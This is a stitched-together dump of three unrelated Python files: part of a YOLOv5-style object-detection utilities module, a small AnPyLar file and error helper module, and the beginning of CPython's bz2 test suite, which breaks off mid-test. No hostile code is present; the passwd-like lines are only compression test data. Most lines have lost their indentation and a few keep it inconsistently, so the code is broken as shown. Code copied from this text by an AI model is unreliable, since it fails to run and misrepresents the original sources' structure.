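#   make_divisible(100, 8)    # -> 104
#   make_divisible(128, 32)   # -> 128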
def clean_str(s):
# Cleans a string by replacing special characters with underscore _
return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s)
def one_cycle(y1=0.0, y2=1.0, steps=100):
# lambda function for sinusoidal ramp from y1 to y2 https://arxiv.org/pdf/1812.01187.pdf
return lambda x: ((1 - math.cos(x * math.pi / steps)) / 2) * (y2 - y1) + y1
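# Example (illustrative): one_cycle() returns a lambda suitable for torch.optim.lr_scheduler.LambdaLR,
# ramping smoothly from y1 to y2 over 'steps' epochs.
#
#   lf = one_cycle(1.0, 0.1, 100)
#   lf(0)    # -> 1.0
#   lf(50)   # -> 0.55 (cosine midpoint)
#   lf(100)  # -> 0.1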
def colorstr(*input):
# Colors a string https://en.wikipedia.org/wiki/ANSI_escape_code, i.e. colorstr('blue', 'hello world')
*args, string = input if len(input) > 1 else ('blue', 'bold', input[0]) # color arguments, string
colors = {
'black': '\033[30m', # basic colors
'red': '\033[31m',
'green': '\033[32m',
'yellow': '\033[33m',
'blue': '\033[34m',
'magenta': '\033[35m',
'cyan': '\033[36m',
'white': '\033[37m',
'bright_black': '\033[90m', # bright colors
'bright_red': '\033[91m',
'bright_green': '\033[92m',
'bright_yellow': '\033[93m',
'bright_blue': '\033[94m',
'bright_magenta': '\033[95m',
'bright_cyan': '\033[96m',
'bright_white': '\033[97m',
'end': '\033[0m', # misc
'bold': '\033[1m',
'underline': '\033[4m'}
return ''.join(colors[x] for x in args) + f'{string}' + colors['end']
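# Examples (illustrative): colorstr() wraps a string in ANSI escape codes; a single argument
# defaults to blue + bold.
#
#   colorstr('hello')                   # -> '\033[34m\033[1mhello\033[0m'
#   colorstr('red', 'bold', 'error: ')  # -> '\033[31m\033[1merror: \033[0m'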
def labels_to_class_weights(labels, nc=80):
# Get class weights (inverse frequency) from training labels
if labels[0] is None: # no labels loaded
return torch.Tensor()
labels = np.concatenate(labels, 0) # labels.shape = (866643, 5) for COCO
    classes = labels[:, 0].astype(int)  # labels = [class xywh]
weights = np.bincount(classes, minlength=nc) # occurrences per class
# Prepend gridpoint count (for uCE training)
# gpi = ((320 / 32 * np.array([1, 2, 4])) ** 2 * 3).sum() # gridpoints per image
# weights = np.hstack([gpi * len(labels) - weights.sum() * 9, weights * 9]) ** 0.5 # prepend gridpoints to start
weights[weights == 0] = 1 # replace empty bins with 1
weights = 1 / weights # number of targets per class
weights /= weights.sum() # normalize
return torch.from_numpy(weights)
def labels_to_image_weights(labels, nc=80, class_weights=np.ones(80)):
# Produces image weights based on class_weights and image contents
# Usage: index = random.choices(range(n), weights=image_weights, k=1) # weighted image sample
    class_counts = np.array([np.bincount(x[:, 0].astype(int), minlength=nc) for x in labels])
return (class_weights.reshape(1, nc) * class_counts).sum(1)
def coco80_to_coco91_class(): # converts 80-index (val2014) to 91-index (paper)
# https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/
# a = np.loadtxt('data/coco.names', dtype='str', delimiter='\n')
# b = np.loadtxt('data/coco_paper.names', dtype='str', delimiter='\n')
# x1 = [list(a[i] == b).index(True) + 1 for i in range(80)] # darknet to coco
# x2 = [list(b[i] == a).index(True) if any(b[i] == a) else None for i in range(91)] # coco to darknet
return [
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32, 33, 34,
35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63,
64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88, 89, 90]
def xyxy2xywh(x):
# Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center
y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center
y[:, 2] = x[:, 2] - x[:, 0] # width
y[:, 3] = x[:, 3] - x[:, 1] # height
return y
def xywh2xyxy(x):
# Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x
y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y
y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x
y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y
return y
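# Example (illustrative): xyxy2xywh() and xywh2xyxy() are inverses of each other on nx4 arrays.
#
#   b = np.array([[10., 20., 50., 80.]])  # x1, y1, x2, y2
#   xyxy2xywh(b)                          # -> [[30., 50., 40., 60.]]  (xc, yc, w, h)
#   xywh2xyxy(xyxy2xywh(b))               # -> [[10., 20., 50., 80.]]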
def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0):
# Convert nx4 boxes from [x, y, w, h] normalized to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * (x[:, 0] - x[:, 2] / 2) + padw # top left x
y[:, 1] = h * (x[:, 1] - x[:, 3] / 2) + padh # top left y
y[:, 2] = w * (x[:, 0] + x[:, 2] / 2) + padw # bottom right x
y[:, 3] = h * (x[:, 1] + x[:, 3] / 2) + padh # bottom right y
return y
def xyxy2xywhn(x, w=640, h=640, clip=False, eps=0.0):
# Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] normalized where xy1=top-left, xy2=bottom-right
if clip:
clip_coords(x, (h - eps, w - eps)) # warning: inplace clip
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = ((x[:, 0] + x[:, 2]) / 2) / w # x center
y[:, 1] = ((x[:, 1] + x[:, 3]) / 2) / h # y center
y[:, 2] = (x[:, 2] - x[:, 0]) / w # width
y[:, 3] = (x[:, 3] - x[:, 1]) / h # height
return y
def xyn2xy(x, w=640, h=640, padw=0, padh=0):
# Convert normalized segments into pixel segments, shape (n,2)
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * x[:, 0] + padw # top left x
y[:, 1] = h * x[:, 1] + padh # top left y
return y
def segment2box(segment, width=640, height=640):
# Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy)
x, y = segment.T # segment xy
inside = (x >= 0) & (y >= 0) & (x <= width) & (y <= height)
    x, y = x[inside], y[inside]
return np.array([x.min(), y.min(), x.max(), y.max()]) if any(x) else np.zeros((1, 4)) # xyxy
def segments2boxes(segments):
# Convert segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh)
boxes = []
for s in segments:
x, y = s.T # segment xy
boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy
return xyxy2xywh(np.array(boxes)) # cls, xywh
def resample_segments(segments, n=1000):
# Up-sample an (n,2) segment
for i, s in enumerate(segments):
x = np.linspace(0, len(s) - 1, n)
xp = np.arange(len(s))
segments[i] = np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)]).reshape(2, -1).T # segment xy
return segments
def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None):
# Rescale coords (xyxy) from img1_shape to img0_shape
if ratio_pad is None: # calculate from img0_shape
gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new
pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding
else:
gain = ratio_pad[0][0]
pad = ratio_pad[1]
coords[:, [0, 2]] -= pad[0] # x padding
coords[:, [1, 3]] -= pad[1] # y padding
coords[:, :4] /= gain
clip_coords(coords, img0_shape)
return coords
def clip_coords(boxes, shape):
# Clip bounding xyxy bounding boxes to image shape (height, width)
if isinstance(boxes, torch.Tensor): # faster individually
boxes[:, 0].clamp_(0, shape[1]) # x1
boxes[:, 1].clamp_(0, shape[0]) # y1
boxes[:, 2].clamp_(0, shape[1]) # x2
boxes[:, 3].clamp_(0, shape[0]) # y2
else: # np.array (faster grouped)
boxes[:, [0, 2]] = boxes[:, [0, 2]].clip(0, shape[1]) # x1, x2
boxes[:, [1, 3]] = boxes[:, [1, 3]].clip(0, shape[0]) # y1, y2
def non_max_suppression(prediction,
conf_thres=0.25,
iou_thres=0.45,
classes=None,
agnostic=False,
multi_label=False,
labels=(),
max_det=300):
"""Non-Maximum Suppression (NMS) on inference results to reject overlapping bounding boxes
Returns:
list of detections, on (n,6) tensor per image [xyxy, conf, cls]
"""
bs = prediction.shape[0] # batch size
nc = prediction.shape[2] - 5 # number of classes
xc = prediction[..., 4] > conf_thres # candidates
# Checks
assert 0 <= conf_thres <= 1, f'Invalid Confidence threshold {conf_thres}, valid values are between 0.0 and 1.0'
assert 0 <= iou_thres <= 1, f'Invalid IoU {iou_thres}, valid values are between 0.0 and 1.0'
# Settings
# min_wh = 2 # (pixels) minimum box width and height
max_wh = 7680 # (pixels) maximum box width and height
max_nms = 30000 # maximum number of boxes into torchvision.ops.nms()
time_limit = 0.3 + 0.03 * bs # seconds to quit after
redundant = True # require redundant detections
multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img)
merge = False # use merge-NMS
t = time.time()
output = [torch.zeros((0, 6), device=prediction.device)] * bs
for xi, x in enumerate(prediction): # image index, image inference
# Apply constraints
# x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 # width-height
x = x[xc[xi]] # confidence
# Cat apriori labels if autolabelling
if labels and len(labels[xi]):
lb = labels[xi]
v = torch.zeros((len(lb), nc + 5), device=x.device)
v[:, :4] = lb[:, 1:5] # box
v[:, 4] = 1.0 # conf
v[range(len(lb)), lb[:, 0].long() + 5] = 1.0 # cls
x = torch.cat((x, v), 0)
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T
x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1)
else: # best class only
conf, j = x[:, 5:].max(1, keepdim=True)
x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres]
# Filter by class
if classes is not None:
x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]
# Apply finite constraint
# if not torch.isfinite(x).all():
# x = x[torch.isfinite(x).all(1)]
# Check shape
n = x.shape[0] # number of boxes
if not n: # no boxes
continue
elif n > max_nms: # excess boxes
x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence
# Batched NMS
c = x[:, 5:6] * (0 if agnostic else max_wh) # classes
boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores
i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS
if i.shape[0] > max_det: # limit detections
i = i[:max_det]
if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)
# update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix
weights = iou * scores[None] # box weights
x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes
if redundant:
i = i[iou.sum(1) > 1] # require redundancy
output[xi] = x[i]
if (time.time() - t) > time_limit:
LOGGER.warning(f'WARNING: NMS time limit {time_limit:.3f}s exceeded')
break # time limit exceeded
return output
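# Illustrative usage sketch (assumption, not from the original module): running NMS on raw
# model output during inference. 'model' and 'im' are hypothetical placeholders for a loaded
# YOLOv5 model and a preprocessed (1, 3, H, W) image tensor.
#
#   pred = model(im)[0]  # raw predictions, shape (bs, n, nc + 5)
#   pred = non_max_suppression(pred, conf_thres=0.25, iou_thres=0.45, max_det=300)
#   for det in pred:     # one (n, 6) tensor per image: [x1, y1, x2, y2, conf, cls]
#       det[:, :4] = scale_coords(im.shape[2:], det[:, :4], im0_shape).round()  # im0_shape assumed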
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'best_fitness', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
LOGGER.info(f"Optimizer stripped from {f},{f' saved as {s},' if s else ''} {mb:.1f}MB")
def print_mutation(results, hyp, save_dir, bucket, prefix=colorstr('evolve: ')):
evolve_csv = save_dir / 'evolve.csv'
evolve_yaml = save_dir / 'hyp_evolve.yaml'
keys = ('metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', 'val/box_loss',
'val/obj_loss', 'val/cls_loss') + tuple(hyp.keys()) # [results + hyps]
keys = tuple(x.strip() for x in keys)
vals = results + tuple(hyp.values())
n = len(keys)
# Download (optional)
if bucket:
url = f'gs://{bucket}/evolve.csv'
if gsutil_getsize(url) > (evolve_csv.stat().st_size if evolve_csv.exists() else 0):
os.system(f'gsutil cp {url} {save_dir}') # download evolve.csv if larger than local
# Log to evolve.csv
s = '' if evolve_csv.exists() else (('%20s,' * n % keys).rstrip(',') + '\n') # add header
with open(evolve_csv, 'a') as f:
f.write(s + ('%20.5g,' * n % vals).rstrip(',') + '\n')
# Save yaml
with open(evolve_yaml, 'w') as f:
data = pd.read_csv(evolve_csv)
data = data.rename(columns=lambda x: x.strip()) # strip keys
        i = np.argmax(fitness(data.values[:, :4]))  # index of best generation
generations = len(data)
f.write('# YOLOv5 Hyperparameter Evolution Results\n' + f'# Best generation: {i}\n' +
f'# Last generation: {generations - 1}\n' + '# ' + ', '.join(f'{x.strip():>20s}' for x in keys[:7]) +
'\n' + '# ' + ', '.join(f'{x:>20.5g}' for x in data.values[i, :7]) + '\n\n')
yaml.safe_dump(data.loc[i][7:].to_dict(), f, sort_keys=False)
# Print to screen
LOGGER.info(prefix + f'{generations} generations finished, current result:\n' + prefix +
', '.join(f'{x.strip():>20s}' for x in keys) + '\n' + prefix + ', '.join(f'{x:20.5g}'
for x in vals) + '\n\n')
if bucket:
os.system(f'gsutil cp {evolve_csv} {evolve_yaml} gs://{bucket}') # upload
def apply_classifier(x, model, img, im0):
# Apply a second stage classifier to YOLO outputs
# Example model = torchvision.models.__dict__['efficientnet_b0'](pretrained=True).to(device).eval()
im0 = [im0] if isinstance(im0, np.ndarray) else im0
for i, d in enumerate(x): # per image
if d is not None and len(d):
d = d.clone()
# Reshape and pad cutouts
b = xyxy2xywh(d[:, :4]) # boxes
b[:, 2:] = b[:, 2:].max(1)[0].unsqueeze(1) # rectangle to square
b[:, 2:] = b[:, 2:] * 1.3 + 30 # pad
d[:, :4] = xywh2xyxy(b).long()
# Rescale boxes from img_size to im0 size
scale_coords(img.shape[2:], d[:, :4], im0[i].shape)
# Classes
pred_cls1 = d[:, 5].long()
ims = []
for a in d:
cutout = im0[i][int(a[1]):int(a[3]), int(a[0]):int(a[2])]
im = cv2.resize(cutout, (224, 224)) # BGR
im = im[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
im = np.ascontiguousarray(im, dtype=np.float32) # uint8 to float32
im /= 255 # 0 - 255 to 0.0 - 1.0
ims.append(im)
pred_cls2 = model(torch.Tensor(ims).to(d.device)).argmax(1) # classifier prediction
x[i] = x[i][pred_cls1 == pred_cls2] # retain matching class detections
return x
def increment_path(path, exist_ok=False, sep='', mkdir=False):
# Increment file or directory path, i.e. runs/exp --> runs/exp{sep}2, runs/exp{sep}3, ... etc.
path = Path(path) # os-agnostic
if path.exists() and not exist_ok:
path, suffix = (path.with_suffix(''), path.suffix) if path.is_file() else (path, '')
# Method 1
for n in range(2, 9999):
p = f'{path}{sep}{n}{suffix}' # increment path
if not os.path.exists(p): #
break
path = Path(p)
# Method 2 (deprecated)
# dirs = glob.glob(f"{path}{sep}*") # similar paths
# matches = [re.search(rf"{path.stem}{sep}(\d+)", d) for d in dirs]
# i = [int(m.groups()[0]) for m in matches if m] # indices
# n = max(i) + 1 if i else 2 # increment number
# path = Path(f"{path}{sep}{n}{suffix}") # increment path
if mkdir:
path.mkdir(parents=True, exist_ok=True) # make directory
return path
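# Examples (illustrative), assuming 'runs/exp' exists and 'runs/exp2' does not:
#
#   increment_path('runs/exp')                 # -> Path('runs/exp2')
#   increment_path('runs/exp', sep='_')        # -> Path('runs/exp_2')
#   increment_path('runs/exp', exist_ok=True)  # -> Path('runs/exp')  (reuse existing)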
# OpenCV Chinese-friendly functions ------------------------------------------------------------------------------------
imshow_ = cv2.imshow # copy to avoid recursion errors
def imread(path, flags=cv2.IMREAD_COLOR):
return cv2.imdecode(np.fromfile(path, np.uint8), flags)
def imwrite(path, im):
try:
cv2.imencode(Path(path).suffix, im)[1].tofile(path)
return True
except Exception:
return False
def imshow(path, im):
imshow_(path.encode('unicode_escape').decode(), im)
cv2.imread, cv2.imwrite, cv2.imshow = imread, imwrite, imshow # redefine
# Variables ------------------------------------------------------------------------------------------------------------
NCOLS = 0 if is_docker() else shutil.get_terminal_size().columns # terminal window size for tqdm
|
utils.py
|
#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
# Copyright 2018 The AnPyLar Team. All Rights Reserved.
# Use of this source code is governed by an MIT-style license that
# can be found in the LICENSE file at http://anpylar.com/mit-license
###############################################################################
import errno
import os
import sys
# prints the error and the parser help and bails out
def print_error(error, parser=None):
print('-' * 50)
print(error)
print('-' * 50)
print()
if parser:
try:
parser.print_help()
except:
pass # avoid new errors
sys.exit(1)
# calculates the name of the item's names by lowercasing and inserting an _
# as a transition between lowercase -> uppercase in the original
# PyroDetail -> pyro_detail
def path_name_calc(name, separator='_'):
tokens = []
lastlower = False
for x in name:
if x.isupper():
if lastlower:
tokens.append(separator)
tokens.append(x.lower())
lastlower = False
else:
tokens.append(x)
lastlower = x.islower()
return ''.join(tokens)
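# Examples (illustrative) of the lowercase -> uppercase transition rule described above:
#
#   path_name_calc('PyroDetail')       # -> 'pyro_detail'
#   path_name_calc('PyroDetail', '-')  # -> 'pyro-detail'
#   path_name_calc('HTTPServer')       # -> 'httpserver'  (no lowercase -> uppercase transition)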
def makedir_error(dirname, parser=None):
if dirname in ['.', '..']:
return
try:
os.makedirs(dirname) # try to make the dir
except OSError as e:
if e.errno != errno.EEXIST: # strange error
print_error(e, parser)
else:
e = 'Directory already exists.'
print_error(e, parser)
def makefile_error(filename, content, parser=None,
encoding='utf-8', newline='\n',
end='\n', itercontent=False, mode='w'):
if 'b' in mode:
encoding = None
try:
if hasattr(filename, 'write'):
f = filename
elif filename == '-':
f = sys.stdout
else:
try:
f = open(filename, mode, newline=newline, encoding=encoding)
except EnvironmentError as e: # some file error
print_error(e, parser)
if not itercontent:
f.write(content)
else:
for x in content:
f.write(x)
if end:
f.write(end)
except EnvironmentError as e: # some file error
print_error(e, parser)
def readfile_error(filename, parser=None, encoding='utf-8',
newline=None, mode='r'):
if 'b' in mode:
encoding = None
try:
with open(filename, mode, newline=newline, encoding=encoding) as f:
return f.read()
except EnvironmentError as e: # some file error
print_error(e, parser)
def read_license(filename, parser=None):
output = ''
if filename:
try:
with open(filename) as f:
for l in f:
if l[0] != '#': # comment it out if needed
output += '# '
output += l
output += '#' * 79 + '\n' # PEP-8 compliant, as separator to code
except EnvironmentError as e:
# parent of IOError/OSError/WindowsError where
print_error(e, parser)
return output
def win_wait_for_parent(raise_exceptions=False):
if not sys.platform == 'win32':
return True
# When started under cygwin, the parent process will die leaving a child
# hanging around. The process has to be waited upon
import ctypes
from ctypes.wintypes import DWORD, BOOL, HANDLE
import threading
kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
# Get a handle for the right purpose (wait on it aka "synchronization")
SYNCHRONIZE = 0x00100000
phandle = kernel32.OpenProcess(SYNCHRONIZE, 0, os.getppid())
def check_parent():
# Wait for parent signal (death) and exit
kernel32.WaitForSingleObject(phandle, -1) # -1 -> INFINITE
os._exit(0)
if not phandle: # if not possible
if raise_exceptions: # either raise if wished
raise ctypes.WinError(ctypes.get_last_error())
return False # or let the caller know
# kickstart parent check in the background thread
threading.Thread(target=check_parent).start()
return True
|
test_bz2.py
|
from test import support
from test.support import bigmemtest, _4G
import unittest
from io import BytesIO, DEFAULT_BUFFER_SIZE
import os
import pickle
import glob
import tempfile
import pathlib
import random
import shutil
import subprocess
import threading
from test.support import unlink
import _compression
import sys
# Skip tests if the bz2 module doesn't exist.
bz2 = support.import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = None
def ext_decompress(data):
global has_cmdline_bunzip2
if has_cmdline_bunzip2 is None:
has_cmdline_bunzip2 = bool(shutil.which('bunzip2'))
if has_cmdline_bunzip2:
return subprocess.check_output(['bunzip2'], input=data)
else:
return bz2.decompress(data)
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT_LINES = [
b'root:x:0:0:root:/root:/bin/bash\n',
b'bin:x:1:1:bin:/bin:\n',
b'daemon:x:2:2:daemon:/sbin:\n',
b'adm:x:3:4:adm:/var/adm:\n',
b'lp:x:4:7:lp:/var/spool/lpd:\n',
b'sync:x:5:0:sync:/sbin:/bin/sync\n',
b'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n',
b'halt:x:7:0:halt:/sbin:/sbin/halt\n',
b'mail:x:8:12:mail:/var/spool/mail:\n',
b'news:x:9:13:news:/var/spool/news:\n',
b'uucp:x:10:14:uucp:/var/spool/uucp:\n',
b'operator:x:11:0:operator:/root:\n',
b'games:x:12:100:games:/usr/games:\n',
b'gopher:x:13:30:gopher:/usr/lib/gopher-data:\n',
b'ftp:x:14:50:FTP User:/var/ftp:/bin/bash\n',
b'nobody:x:65534:65534:Nobody:/home:\n',
b'postfix:x:100:101:postfix:/var/spool/postfix:\n',
b'niemeyer:x:500:500::/home/niemeyer:/bin/bash\n',
b'postgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\n',
b'mysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\n',
b'www:x:103:104::/var/www:/bin/false\n',
]
TEXT = b''.join(TEXT_LINES)
DATA = b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
EMPTY_DATA = b'BZh9\x17rE8P\x90\x00\x00\x00\x00'
BAD_DATA = b'this is not a valid bzip2 file'
# Some tests need more than one block of uncompressed data. Since one block
# is at least 100,000 bytes, we gather some data dynamically and compress it.
# Note that this assumes that compression works correctly, so we cannot
# simply use the bigger test data for all tests.
test_size = 0
BIG_TEXT = bytearray(128*1024)
for fname in glob.glob(os.path.join(glob.escape(os.path.dirname(__file__)), '*.py')):
with open(fname, 'rb') as fh:
test_size += fh.readinto(memoryview(BIG_TEXT)[test_size:])
if test_size > 128*1024:
break
BIG_DATA = bz2.compress(BIG_TEXT, compresslevel=1)
def setUp(self):
fd, self.filename = tempfile.mkstemp()
os.close(fd)
def tearDown(self):
support.gc_collect()
unlink(self.filename)
class BZ2FileTest(BaseTest):
"Test the BZ2File class."
def createTempFile(self, streams=1, suffix=b""):
with open(self.filename, "wb") as f:
f.write(self.DATA * streams)
f.write(suffix)
def testBadArgs(self):
self.assertRaises(TypeError, BZ2File, 123.456)
self.assertRaises(ValueError, BZ2File, os.devnull, "z")
self.assertRaises(ValueError, BZ2File, os.devnull, "rx")
self.assertRaises(ValueError, BZ2File, os.devnull, "rbt")
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=0)
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=10)
def testRead(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
def testReadBadFile(self):
self.createTempFile(streams=0, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertRaises(OSError, bz2f.read)
def testReadMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testReadMonkeyMultiStream(self):
# Test BZ2File.read() on a multi-stream archive where a stream
# boundary coincides with the end of the raw read buffer.
buffer_size = _compression.BUFFER_SIZE
_compression.BUFFER_SIZE = len(self.DATA)
try:
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
finally:
_compression.BUFFER_SIZE = buffer_size
def testReadTrailingJunk(self):
self.createTempFile(suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT)
def testReadMultiStreamTrailingJunk(self):
self.createTempFile(streams=5, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testRead0(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(0), b"")
def testReadChunk10(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT)
def testReadChunk10MultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT * 5)
def testRead100(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(100), self.TEXT[:100])
def testPeek(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testReadInto(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
n = 128
b = bytearray(n)
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b, self.TEXT[:n])
n = len(self.TEXT) - n
b = bytearray(len(self.TEXT))
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b[:n], self.TEXT[-n:])
def testReadLine(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES:
self.assertEqual(bz2f.readline(), line)
def testReadLineMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES * 5:
self.assertEqual(bz2f.readline(), line)
def testReadLines(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES)
def testReadLinesMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES * 5)
def testIterator(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES)
def testIteratorMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
